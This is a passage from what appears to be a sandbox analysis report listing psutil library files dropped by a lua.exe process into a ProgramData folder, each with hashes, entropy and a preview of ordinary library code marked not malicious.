MD5:	3C32A569298D5A4C0F52D0425B42FD4E
SHA1:	D930CC02226E1F2F49ACFCA1FE7BE13B0733EECE
SHA-256:	04CA09CFCD22325477EDA9E54FD0ABC0A8F0A45704AD57D1D7F22EEA9E64AE18
SHA-512:	B0A85EFC36C6661129B7F299461CCC73663F5159F52A64FA956F66CFCCD7E13800A9315FAB27E583AD293A505D2876336A56B22EF75AB0CEFA7269475F00AB09
Malicious:	false
Preview:	B.........R`]y...................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.....m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..g.Z#e...rze.j$e.j%e.j&e.j'e.j(e.j)e.je.j+e.j,e.j-e.j.e.j/e.j0e.j1i.Z2n~e...r.e.j$e.j%e.j(e.j)e.je.j+e.j3e.j-e.j,e.j-e.j&e.j4e.j5e.j'i.Z2n:e...r.e.j$e.j%e.j(e.j)e.je.j+e.j,e.j-e.j&e.j4e.j5e.j'i.Z2e.j6e.j7e.j8e.j9e.j:e.j;e.j<e.j=e.j>e.j?e.j@e.jAe.jBe.jCe.jDe.jEe.jFe.jGe.jHe.jIe.jJe.jKe.jLe.jMi.ZNe..O..ZPe.jQZQeRe.d...ZSeRe.d...ZTeRe.d...ZUeRe.d...ZVeWd.d.d.d.d.d d!d"d#d$d%d&d'd(d)dd+d,d-d.d/d0d1d2d3d4..ZXe.d5d6d7d8d9d:d;d<d=d>d?d@g...ZYe.dAdBdCdDdEdFg...ZZe.dGdHdIdJdKdLg...Z[e[Z\e.dMdBdDdNdOg...Z]e.dPdQ..Z^e.dRdS..Z_e...r^e.dTdUdVdWdXdYdZd[g...Z`n.e.dTdUdVdWdXg...Z`d\d]..Zad^d_..Zbd`da..ZceS..r.dbd...Zdn.dcd...Zddded_ededf..Zfe...s.e...r.dgdh

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_pslinux.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	49145
Entropy (8bit):	5.673504061479726
Encrypted:	false
SSDEEP:	768:ppmybl4jY645c2n/yJ6v7qsvsz5j93hNPpakWbr1k1KJPdXxCMfSkQl5QeqaYwTf:ppm++2n/ycOsvC5/NgkopzXMMfZ81uB4
MD5:	A8BCBD7F1B7080DF3D3B49B67290C8CB
SHA1:	E026EEF6CC25505C85FDC56CFD857EA56FB92FFC
SHA-256:	004C39ED9C513EECE4C47024424878BF65F20D20FA709E704B408DE9205BC8B5
SHA-512:	9668359B0C03C707383EE9E8862A525B6E470AACE5C2EE042F1CBC838328A1A3F2CFBAAC94F5303F3C87850D40C8CD6CAE4D06FA1F36802B39A103C2F42CFCAD
Malicious:	false
Preview:	B.........R`.@...................@...s@...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..d.d.l.m&Z&..d.d.l.m'Z'..d.d.l.m(Z(..d.d.l.m)Z)..d.d.lm+Z+..d.d.lm,Z,..d.d.lm-Z-..d.d lm.Z...d.d!lm/Z/..d.d"lm0Z0..e.j1d#k...r.d.d.l2Z2n.d.Z2d$d%d&d'd(d)d*d+d,d-d.d/d0d1d2d3g.Z3d4Z4e.j5.6d5e..7......Z8e9e.d6..Z:e9e.d7..Z;e<..Z=e..>d8..Z?e..@..ZAd.aBe0..rhd9n.d:ZCe.jDd;k.ZEd<ZFe2d.k...r.e.jGZHn.e2.Id=d>eJe.jG..i...ZKeKjHZHe2d.k...r.d.ZLd.ZMd?ZNd@ZOn G.dAdB..dBe2jI..ZPeQ...RePjS....e.jTe.jUe.jVe.jWe.jXe.jYe.jZe.jZe.j[e.j\e.j]e.j^dC..Z_e.j`e.jae.jbe.jce.jde.jee.jfe.jge.jhe.jie.jjdD..Zke.dEdFdGdHdIdJdKdLdMdNdOdPg...Zle.dQdRdSdTdUdVdWdXdYdZg...Zme.d[d\d]d^d_d`g...Zne.dadb..Zoe.dceojpdd....Zqe.ded\df

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_psosx.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14469
Entropy (8bit):	5.369139391826787
Encrypted:	false
SSDEEP:	384:cKb7QpsQ1wCEoDx8zrnwQKhAbIasyhV2R9iJfv:97QJ1pqXnwQOAbIN6U9iJfv
MD5:	8A7ED4DA229D5CE057F52B3962A30828
SHA1:	A7C4D1702254CA3B1E17757C6A965D080ABBD0D5
SHA-256:	4270B3CD7D19B7228548B07797563C28A88E19705D9A382801B56C00800DB9C4
SHA-512:	CBD9198C99580F10DDF8AEC6A005FFCC0195C25C83433B0DF114E2670F1D7C5B44C3BEFC8B743CD428526D8BB5A9F98FC2210FBDF663B05E3FDE33F2BF7CD4BA
Malicious:	false
Preview:	B.........R`VD...................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.Z.e.....Z.e.j.Z.e.j.e.j.e.j e.j!e.j"e.j#e.j$e.j%e.j&e.j'e.j(e.j)e.je.j+e.j,e.j-e.j.e.j/e.j0e.j1e.j2e.j3e.j4e.j5i.Z6e.j7e.j8e.j9e.j:e.j;e.j<e.j=e.j>e.j?e.j@i.ZAeBd.d.d.d.d.d.d.d.d.d.d.d...ZCeBd.d.d.d.d.d.d.d.d...ZDe.d.d d!d"d#g...ZEe.d$d%d&d'd(d)dd+d,g...ZFe.d-d.d/d0d1g...ZGe.d2eGjHd3....ZId4d5..ZJd6d7..ZKd8d9..ZLd:d;..ZMd<d=..ZNd>d?..ZOd@dA..ZPdBdC..ZQe.jRZRe.jSZSd\dEdF..ZTdGdH..ZUe.jVZVe.jWZWd]dJdK..ZXdLdM..ZYdNdO..ZZdPdQ..Z[dRdS..Z\e.j]Z]dTdU..Z^dVdW..Z_e.j`dXdY....ZaG.dZd[..d[eb..Zcd.S.)^z.macOS platform implementation......N)...namedtuple.....)..._common)..._psposix)..._psutil_osx)..._psutil_posix)...AccessDenied)...conn_tmap)...conn_to_ntuple)...isfile_strict)...memoize_when_activated)...NoSuchProcess)...parse_e

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_psposix.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4506
Entropy (8bit):	5.56002651484508
Encrypted:	false
SSDEEP:	96:na/tvaXrFfiq5bR9poO97VkP1HER9ZXREf/60gAQjUOHtFAx:nMtvgh5bRQA7w69ZXY60nQhNFW
MD5:	F45E71EF6FF84380BE5FF6E389A90355
SHA1:	7D9DFD8E0F045A8BE2BACBD6572FB4CEB1C097B7
SHA-256:	FDE1E11F118703838297E501C90C7D6767F24148746CE34E0577910A88392837
SHA-512:	F97026656E13CDB119EF96C1157669B6B6D645CC214541EA2B06804AEF671C264F6C260C042E8928DAB3A81C3A48B426ACF2E2CABBF7E74AB78EE2908834D11E
Malicious:	false
Preview:	B.........R`m....................@...s^...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.d.k.r.d.d.l.Z.n.d.Z.d.d.d.d.g.Z.d.d...Z.e.d.k...r.e.e.d.....r.e...d.e.d.d...e.j.D.......Z.d.d...Z.n.d.d...Z.d.d.e.j.e.e.d.e.j...e.e.j e.f.d.d...Z!d.d...Z"e.d.d.....Z#d.S.) z%Routines common to all posix systems......N.....)...memoize)...sdiskusage)...TimeoutExpired)...usage_percent)...ChildProcessError)...FileNotFoundError)...InterruptedError)...PermissionError)...ProcessLookupError)...PY3)...unicode).............pid_exists..wait_pid..disk_usage..get_terminal_mapc................C...sL...\|.d.k.r.d.S.y.t...\|.d.....W.n&..t.k.r0......d.S...t.k.rB......d.S.X.d.S.d.S.).z6Check whether pid exists in the current process table.r....TFN)...os..killr....r....)...pid..r.....4D:\python-3.7.3\Lib\site-packages\psutil/_psposix.pyr...."...s........................Signals..Negsignalc

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_pssunos.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18106
Entropy (8bit):	5.461951506567444
Encrypted:	false
SSDEEP:	384:SPuVBu+s9xwOedTm6pYSlV0sg0bjQDn5L+Mm9LkT:SWLu+sEXd661lV0sN4L+r9LkT
MD5:	BE95424588FFAE5F5357952CEDC08501
SHA1:	61FA308DCE37BB212F7747CDD870656B46F2B741
SHA-256:	60F8B18EEDF3D71C5A2582C02B7AF4AFA189FCE9BE517CBCE18D405A8D574F56
SHA-512:	0D4348AFDBDE873AF57A81E7766D418D18A8636982A36BCC6D68DCFBA1ABE2FC577F82CD821A69842916CAFB03E49AAF8EA2052701883892155E0697ADA0BA68
Malicious:	false
Preview:	B.........R`.c...................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.d.g.Z"e..#..Z$e.j%Z%e.j&d.k.Z'd.Z(d.Z)e.je.j+e.j,e.j-e.j.e.j/e.j0e.j1e.j2e.j3e.j4e.j-e.j5e.j6i.Z7e.j8e.j9e.j:e.j;e.j<e.j=e.j>e.j?e.j@e.jAe.jBe.jCe.jDe.jEe.jFe.jGe.jHe.jIe.jJe.jKe.jLe.jMe.jNe.jOe.jPe(e.jQe)i.ZReSd.d.d d!d"d#d$d%d&d'd(d)d..ZTe.d+d,d-d.d/g...ZUe.d0d,d-d1d2g...ZVe.d3d4d5d6d7d8g...ZWe.d9d:d;g...ZXeXZYe.d<d=d:d>d?g...ZZe.d@dAdB.[eZj\......Z]dCdD..Z^dEdF..Z_dGdH..Z`dIdJ..ZadKdL..ZbdMdN..ZcdOdP..Zde.jeZee.jfZfdedRdS..Zge.jhZhe.jiZidfdUdV..ZjdWdX..ZkdYdZ..Zld[d\..Zmd]d^..Znd_d`..Zodadb..ZpG.dcdd..ddeq..Zrd.S.)gz'Sun OS Solaris platform implementation......N)...namedtuple)...AF_INET.....)..._common)..._psposix)..._psutil_

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\__pycache__\_pswindows.cpython-37.pyc Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	28653
Entropy (8bit):	5.426846092053715
Encrypted:	false
SSDEEP:	768:r/5SklntNDvjIhCF1Qp5T4WbrZMsHJ3HwkLB9+5l:rB1ln/soQp5TdNXJgX
MD5:	8BD6FD2C70C96758962B6293ED2F4605
SHA1:	B2FD7299B775967A3C4B557197A06772B998C216
SHA-256:	7072F365F8185AC37DCD72636C59A5686891923F1FB8D1791F26073CC3319408
SHA-512:	80E60DCBFA1F22AD90A68442673DB389503C70A08EF6E522F4F17866C147216C44B9B4ED5D8B9D16013DACFA9AD47B7855B8E3D8C42CB87BA3AD45A040121649
Malicious:	false
Preview:	B.........R`....................@...s(...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l.m"Z"..d.d.l.m#Z#..d.d.l.m$Z$..d.d.l.m%Z%..y.d.d.l.m.Z&..W.nj..e'k...r...Z(..zJe)e(......+d.....r.e..,..d...d k...r.d!Z-e-d"7.Z-e-d#7.Z-e.e-....n...W.d.d.Z([(X.Y.n.X.e.j/d$k...r.d.d.l0Z0n.d.Z0d%d&d'd(d)dd+d,d-d.d/d0d1d2g.Z1d3Z2d4Z3d5e.j4k.Z5e0d.k...rLd6Z6n.e0.7d7d2d6i...Z8e8j6Z6e&j9e.j:e&j;e.j<e&j=e.j>e&j?e.j@e&jAe.jBe&jCe.jDe&jEe.jFe&jGe.jHe&jIe.jJe&jKe.jLe&jMe.jNe&jOe2e&jPe.jQi.ZRe0d.k...r.G.d8d9..d9e0j7..ZSeT...UeSjV....e0d.k...r.d.ZWd.ZXd:ZYd;ZZn G.d<d=..d=e0j7..Z[eT...Ue[jV....e\d.d.d:d;d>d?d d@dAdBdCdDdEdFdGdHdIdJdKdLdMdNdO..Z]e.dPdQdRdSdTdUg...Z^e.dVdWdXdYdZd[g...Z_e.d\d]d^d_d`dadbdcdddedfdgdhg...Z`e.die`jadj....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_common.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26218
Entropy (8bit):	4.899727091344053
Encrypted:	false
SSDEEP:	384:+REVwhqTFGFFvW4Iasj8c9eYaPrPNg0nh5PAJQN51aD:Li+FGDdsoc9eYgK0nh5ocaD
MD5:	3F9C08B651BA10B38523056BB759DF97
SHA1:	E2FA44CFECF3584A520D30F92AAED5DD5BC1557D
SHA-256:	21E8FDB9AD3F1F873E96098AC77C415831D13FE3DBE2CCD4F9035BF1C37A77C3
SHA-512:	14BE301347DA84FE06C1BA831DCEDBAF4C0EC17068F278F21502FB833769D51B542D18468D3576166044343510F74FFEA6E426022840A6E6D089C7088105F096
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Common objects shared by __init__.py and _ps*.py modules."""..# Note: this module is imported by setup.py so it should not import.# psutil or third-party modules...from __future__ import division, print_function..import contextlib.import errno.import functools.import os.import socket.import stat.import sys.import threading.import warnings.from collections import defaultdict.from collections import namedtuple.from socket import AF_INET.from socket import SOCK_DGRAM.from socket import SOCK_STREAM..try:. from socket import AF_INET6.except ImportError:. AF_INET6 = None.try:. from socket import AF_UNIX.except ImportError:. AF_UNIX = None..if sys.version_info >= (3, 4):. import enum.else:. enum = None...# can't take it from _common.py as this script is imported by setup.py.PY3 = sys.version_info[0] == 3..__al

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14474
Entropy (8bit):	4.156744254553528
Encrypted:	false
SSDEEP:	192:+6q1+GEjkckdyi4i2m8jS9B0l1FYVBXLlX2SauTwB7GVY:+6q1+GKvAyi4i2mCCHJGWwx
MD5:	18815FAC376509E8788C9D10D657D6A5
SHA1:	C8DF6C23A7F33743FEE473D883C34119B23DD0E8
SHA-256:	C2219368B16A08D52B085BC57D15E9E18DE09F9162AB32D41554C2A7A180DED6
SHA-512:	E4182721AE6E85F717E494A9DDCE7373EE9640A1FE1A0C5006078F5B2362A0702AD1198C370D1DE2A237E4A496CD30A0EAB4EAB0DAF734559CBD758EB9AB7FEC
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Module which provides compatibility with older Python versions..This is more future-compatible rather than the opposite (prefer latest.Python 3 way of doing things).."""..import collections.import errno.import functools.import os.import sys.import types..__all__ = [. # constants. "PY3",. # builtins. "long", "range", "super", "unicode", "basestring",. # literals. "u", "b",. # collections module. "lru_cache",. # shutil module. "which", "get_terminal_size",. # python 3 exceptions. "FileNotFoundError", "PermissionError", "ProcessLookupError",. "InterruptedError", "ChildProcessError", "FileExistsError"]...PY3 = sys.version_info[0] == 3._SENTINEL = object()..if PY3:. long = int. xrange = range. unicode = str. basestring = str. range = range.. def u(s):. return s..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psaix.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18555
Entropy (8bit):	4.709382343574393
Encrypted:	false
SSDEEP:	384:th5A8Gm/rTnHccmXDtZVw24UO9tbl2Sd6SIoD:TG8HnnVmXBZVrO9r2ScdoD
MD5:	0BE9FADA0D95FD1B5F58E75ADDE47C81
SHA1:	F0616F74E5BB76A606DEF639834384084D9F0BB6
SHA-256:	D2D630CAC6D964E66C873879265AE6821EF26418FD98045D2A97C812D481D823
SHA-512:	3F6160719502C683C5C912F8A741B565C5AB6E321B09CD092B775B64FBF20CE66D4F146A1B03B04F048033ECA5ED31B067EAAC8F90730CDDBE6936C43F21E0EE
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'.# Copyright (c) 2017, Arnon Yaari.# All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""AIX platform implementation."""..import functools.import glob.import os.import re.import subprocess.import sys.from collections import namedtuple..from . import _common.from . import _psposix.from . import _psutil_aix as cext.from . import _psutil_posix as cext_posix.from ._common import AccessDenied.from ._common import conn_to_ntuple.from ._common import get_procfs_path.from ._common import memoize_when_activated.from ._common import NIC_DUPLEX_FULL.from ._common import NIC_DUPLEX_HALF.from ._common import NIC_DUPLEX_UNKNOWN.from ._common import NoSuchProcess.from ._common import usage_percent.from ._common import ZombieProcess.from ._compat import FileNotFoundError.from ._compat import PermissionError.from ._compat import ProcessLookupError.from ._compat import PY3...__extra__all__ =

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psbsd.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	31069
Entropy (8bit):	4.617630291964673
Encrypted:	false
SSDEEP:	384:+dDbFyv+H6g/52hC/4ply4DY0iafC3+5mFv2bjljB2SvEdB0:IFa+r/52hUe8oY0763Fv2flj0S8dB0
MD5:	1F768CBAE6C1A8CB5FCBE5ACB1FCF8DA
SHA1:	8F37880E52E3936C69D4877F08098E4177719C26
SHA-256:	C1C89694B44D51FBA452395DF313BEE8CA4EE43D2AFB75B11506DE0BD38A9A5C
SHA-512:	EBF4F288679F607775E3506BD588E0394AC3C9D92E5BCA0311C189AA06545A1F2A4BB06A1252DB290EB89DE178B0C29A125F877AC1552025FC476AB3287CD94C
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""FreeBSD, OpenBSD and NetBSD platforms implementation."""..import contextlib.import errno.import functools.import os.import xml.etree.ElementTree as ET.from collections import namedtuple.from collections import defaultdict..from . import _common.from . import _psposix.from . import _psutil_bsd as cext.from . import _psutil_posix as cext_posix.from ._common import AccessDenied.from ._common import conn_tmap.from ._common import conn_to_ntuple.from ._common import FREEBSD.from ._common import memoize.from ._common import memoize_when_activated.from ._common import NETBSD.from ._common import NoSuchProcess.from ._common import OPENBSD.from ._common import usage_percent.from ._common import ZombieProcess.from ._compat import FileNotFoundError.from ._compat import PermissionError.from ._compat import ProcessLookupError.from ._

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_pslinux.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	82101
Entropy (8bit):	4.5686274825168365
Encrypted:	false
SSDEEP:	1536:MGOsMA20E6DoY9uoDK2xNxRMe7NL31D5mskTSETj:MGdDu34xae7NL31D5msGSETj
MD5:	0E7C233BFAAE6791933926E2D94E0A6C
SHA1:	C28E10FA5E37E810DF0757471BA1503185977D90
SHA-256:	E587D4FB39AC70B76AC6B9B8F35AB7FCF172AD8F33D224274478DB2E66349C9D
SHA-512:	732E34B410B3B6CEA1089444A40EF156865EB8B56B7DF00FF9C3513B215FD352CAAF8075A10B112CE289FDBB43077FF7EC44B61E7FF8ED74DBE653A8D3B4AE97
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Linux platform implementation."""..from __future__ import division..import base64.import collections.import errno.import functools.import glob.import os.import re.import socket.import struct.import sys.import traceback.import warnings.from collections import defaultdict.from collections import namedtuple..from . import _common.from . import _psposix.from . import _psutil_linux as cext.from . import _psutil_posix as cext_posix.from ._common import AccessDenied.from ._common import debug.from ._common import decode.from ._common import get_procfs_path.from ._common import isfile_strict.from ._common import memoize.from ._common import memoize_when_activated.from ._common import NIC_DUPLEX_FULL.from ._common import NIC_DUPLEX_HALF.from ._common import NIC_DUPLEX_UNKNOWN.from ._common import NoSuchProcess.from ._common impor

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psosx.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17494
Entropy (8bit):	4.706407919416526
Encrypted:	false
SSDEEP:	384:+yZCYTSbL0/5khAKbGYvTbFJf28x1cAXFYclw2eIzi:ZYS6La5kLbGYXD8AXK+s
MD5:	FD32559F5170D3464246CE2BEC1CB8A2
SHA1:	EC7A5BC43601F10375AEADE38F4DEB25FA461D49
SHA-256:	48B53361ACD05CE748274C998E6F94AA50C5FA1247CBCC9A0D1E2C9630DE3027
SHA-512:	CD49D110563EF6940EC33FA0ECACEAE9E921EEFB3AE2CF00BCB0C7DD0CDF1D66D8C5757AC78230BAADF8D6C0C30672950BAAA1EB784247AC712B45DBDC0CAC10
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""macOS platform implementation."""..import contextlib.import errno.import functools.import os.from collections import namedtuple..from . import _common.from . import _psposix.from . import _psutil_osx as cext.from . import _psutil_posix as cext_posix.from ._common import AccessDenied.from ._common import conn_tmap.from ._common import conn_to_ntuple.from ._common import isfile_strict.from ._common import memoize_when_activated.from ._common import NoSuchProcess.from ._common import parse_environ_block.from ._common import usage_percent.from ._common import ZombieProcess.from ._compat import PermissionError.from ._compat import ProcessLookupError...__extra__all__ = []...# =====================================================================.# --- globals.# ===================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psposix.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8045
Entropy (8bit):	4.496633592085418
Encrypted:	false
SSDEEP:	192:+U7Uybl5bRQA783Gsaao0oUcAsHAf3nX/AGmvMijC0kf:+U1bldRQA7AaaFcAsHAvX/IMJT
MD5:	49E400A19D1EC6D926614B7ED3785AD6
SHA1:	11D51A486C58CCBCA8718DC6B2AA2E4E30B3CEB7
SHA-256:	21C5C94DD53AA2C4C9C23076B83A2108B9EE18F9790464180FABC3834B0E27C7
SHA-512:	DF4797DE57A2C9076517EBCE5B85DCACE5FA6CC73CA5E3346BFB4E3E084F2C49F53E872EB3731186A44591D592B8C668A3138C5620C7F3DC55C654D204FE58D9
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Routines common to all posix systems."""..import glob.import os.import signal.import sys.import time..from ._common import memoize.from ._common import sdiskusage.from ._common import TimeoutExpired.from ._common import usage_percent.from ._compat import ChildProcessError.from ._compat import FileNotFoundError.from ._compat import InterruptedError.from ._compat import PermissionError.from ._compat import ProcessLookupError.from ._compat import PY3.from ._compat import unicode..if sys.version_info >= (3, 4):. import enum.else:. enum = None...__all__ = ['pid_exists', 'wait_pid', 'disk_usage', 'get_terminal_map']...def pid_exists(pid):. """Check whether pid exists in the current process table.""". if pid == 0:. # According to "man 2 kill" PID 0 has a special meaning:. # it refers to <<every process

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_pssunos.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25495
Entropy (8bit):	4.620323280993993
Encrypted:	false
SSDEEP:	384:+SQRjb/vVLEhtbiVC2oBsAGJdvhP9ZbECRB7M0Q7PehIUfY6SWX:d6XvCXbiVC2yxGJdJPbr7APyIgd1X
MD5:	3213FEA0D5E545C48FCAEC5C850E9050
SHA1:	9849B6827D576594BD81B9750DC1F1FD34DB0EB2
SHA-256:	BB7C158529C12ED405B427E1343D6BC43D8A1D6078CCA68D22999E086E73E4C7
SHA-512:	1AA1E992F578558B1D99F35B186AE28FBED6A2A73D860633F256C5165CD5FBA1FE6CE5E06C3FA7C8F131120CEB861A4A0358D52075752B2DA101434350A5D86B
Malicious:	false
Preview:	# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved..# Use of this source code is governed by a BSD-style license that can be.# found in the LICENSE file..."""Sun OS Solaris platform implementation."""..import errno.import functools.import os.import socket.import subprocess.import sys.from collections import namedtuple.from socket import AF_INET..from . import _common.from . import _psposix.from . import _psutil_posix as cext_posix.from . import _psutil_sunos as cext.from ._common import AccessDenied.from ._common import AF_INET6.from ._common import debug.from ._common import get_procfs_path.from ._common import isfile_strict.from ._common import memoize_when_activated.from ._common import NoSuchProcess.from ._common import sockfam_to_enum.from ._common import socktype_to_enum.from ._common import usage_percent.from ._common import ZombieProcess.from ._compat import b.from ._compat import FileNotFoundError.from ._compat import PermissionError.from ._compat import ProcessLooku

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psutil_windows.cp37-win_amd64.pyd Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	74240
Entropy (8bit):	5.973200696706857
Encrypted:	false
SSDEEP:	768:zMFNz0C/0FY9xXkeOKHy/GqAvpkPHIzKf4DDw5KSYcXvYX6YAwhf+8mXkoStZc1w:zyxXPJqHLOc5KbXazkomZcCNHVD84vZ
MD5:	EB2E7580F823B00576880CADA4526092
SHA1:	9195525A1E9CBAC344171DD5333F2DF0852C890F
SHA-256:	3EE35D8A42D5951C8498246AA6D302BBFFECEA65A2FCAA78A069011C6F543D59
SHA-512:	AAAEF52E15A61490D87C2C1E49713590B3BFB65229C4318FA51BEE92B9440E1FD546BFE8773440B559A55A9525F51ED2BFC9996FB4DE50476533DB3D6F284B77
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Iwe.Iwe.Iwe.@...Cwe.r)d.Kwe.r)f.Jwe.r)`.Bwe.r)a.Cwe...d.Kwe...d.Xwe.Iwd..we..)m.Ewe..)e.Hwe..)..Hwe..)g.Hwe.RichIwe.................PE..d...1P._.........." .........~............................................................`.............................................l.......@....`.......@..H............p......p................................................................................text............................... ..`.rdata...1.......2..................@..@.data....6.......0..................@....pdata..H....@......................@..@.gfids.......P......................@..@.rsrc........`......................@..@.reloc.......p....... ..............@..B................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_pswindows.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	36841
Entropy (8bit):	4.742964482446417
Encrypted:	false
SSDEEP:	768:lZJWiOd41XPfTFobhjrmok135Rgcqx3r4cwItm6Qg:lZJWi+41XPLF7wdnhtF
MD5:	EDA393DF7596C2E58ACF6D6D9EFA505C
SHA1:	1E7B90375C14D22CF106DA61BDB25A80E7EABCB3
SHA-256:	2727DF1F1D0F991258FB81672F479EBCF766AE707B77DE80B95EA64EF51ABCF7
SHA-512:	6F4615D20859E4AF10036DE605E259FA489C1D0F40701CBAA3F5F128478B3B58617385264F216F836ED6198E0F65A65A90A9267152DD63A57AF4682A12B9D709
Malicious:	false
